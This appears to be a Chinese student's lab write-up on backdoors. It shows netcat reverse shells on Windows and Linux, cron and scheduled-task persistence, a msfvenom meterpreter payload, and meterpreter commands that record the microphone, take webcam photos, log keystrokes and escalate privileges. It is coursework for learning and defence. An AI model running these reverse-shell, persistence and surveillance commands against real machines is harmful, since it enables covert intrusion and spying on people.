网络对抗技术 2017-2018-2 20152515 Exp2 后门原理与实践

1.实验内容

(1)使用netcat获取主机操作Shell，cron启动 (0.5分)

关于netcat:是一个底层工具，进行基本的TCP UDP数据收发。常被与其他工具结合使用，起到后门的作用。

相关操作实例如下：

• Windows获得Linux Shell

1.windows 打开监听
c:\your_nc_dir>ncat.exe -l -p 8888
//端口号只要是XXXX都可以，一般就写自己的学号作为一个区分。

2.Linux反弹连接win
root@KaliYL:/var/www/html# nc 192.168.43.91 5215 -e /bin/sh
//这里的地址是win主机的地址

3.windows下获得一个linux
shell，可运行任何指令，如ls
c:\your_nc_dir>ncat.exe -l -p 8888  #这条指令是第一步中输入的，不用再输
ls

• Linux获得Windows Shell

1.Linux运行监听指令

root@KaliYL:/var/www/html# nc -l -p 8888
2.Windows反弹连接Linux

 c:\your_nc_dir>ncat.exe -e cmd.exe ip_of_linux 8888
3.Linux下看到Windows的命令提示

root@KaliYL:/var/www/html# nc -l -p 8888 

 Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

 C:\Users\YLWin\Desktop\ncat>
 //可以输入dir来检验

---

利用cron启动获取shell

实验步骤如下：

-   Win7：ncat.exe -l -p 端口号
-   kali：crontab -e  //指令编辑一条定时任务
-   kali：选择vim.basic
-   kali：时间（分） * * * * /bin/netcat 192.168.43.91 5215 -e /bin/sh//在最后一行添加，时间是指每一小时执行一次的分钟数，按照自己的kali虚拟机的时间设定，不然可能要等很久才能得到shell
-   Win7：得到shell执行linux指令

我填写的时间是57：

成功：

---

(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)

创建一个新建触发器：

创建完成之后，可以windows+L锁定计算机让它执行，也可以直接右键运行它。因为我的虚拟机和主机存在快捷键冲突，所以我是直接运行的：

---

(3)使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

首先需要创建可执行文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.46.129 LPORT=5215 -f exe > 20155215_backdoor.exe。

这里有一点非常重要，就是要写的是KALI的地址，不是主机的地址。

我刚开始写错了，所以一直不成功：



正确的：

成功：

---

(4)使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权 (2分)

• 使用record_mic指令截获一段音频：
  
  

• 使用webcam_snap指令可以使用摄像头进行拍照：
  
  
  
  

• 使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录
  
  

• 先使用getuid指令查看当前用户，使用getsystem指令进行提权，如图所示，提权成功：
  
  

---

(5)可选加分内容：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell(1分）加分内容一并写入本实验

---

实验中遇到的问题：

• 问题：网络连接总是出错：
  
  
  
  

• 解决：刚开始我以为是我没有写对地址，因为我刚开始写成了“192.168.46.1”，后来发现应该是“192.168.43.91”,然后还是有问题。

• 我在网上找了一下解决方法：centos下问题：connect：network is unreachable，但是我后来发现和我的网络连接设置有关，我重新设置了一次NAT，然后就好了。

---

2.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

答：通过在我从网络上下载的一些文件或软件安装包中预设后门，从而进入我的系统。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

答：实验中出现过的Windows可以使用新建任务触发器，linux则可以使用cron定时触发。

(3)Meterpreter有哪些给你映像深刻的功能？

答：录音、录像，感觉窃密变得非常简单，我们的生活中也充满了信息泄露的危险。

(4)如何发现自己有系统有没有被安装后门？

答：可以利用杀毒软件查杀，勤检查电脑上的问题，安装补丁。

---

实验总结与体会

这个实验我觉得还是蛮有意思，尤其是第四个实践录音和拍照的。我爸原来在家的时候，就对电脑的摄像头很敏感，那个时候我虽然能够理解，但是还是觉得没必要那么重视。在这次做了这个的实验之后，我意识到其实真的信息的泄露随时随地都有可能发生，漏洞无处不在。然后这次实验做完之后，也觉得很有成就感，在最后的验收阶段，我还和老师用help看了一下录音的其他指令，如设置录音时间多少秒之类的，让我意识到help还是蛮好用的，虽然老师总强调这一点，但是我平常遇到这样的问题还是喜欢百度，没有意识到用help就能得到想要的指令，所以我觉得这个也是一个收获。

设置过程如下所示：



得到的录音文件是下面这个：

---

一个彩蛋

msfconsole打开的界面每次出现的图案都不一样：

我觉得这个最可爱：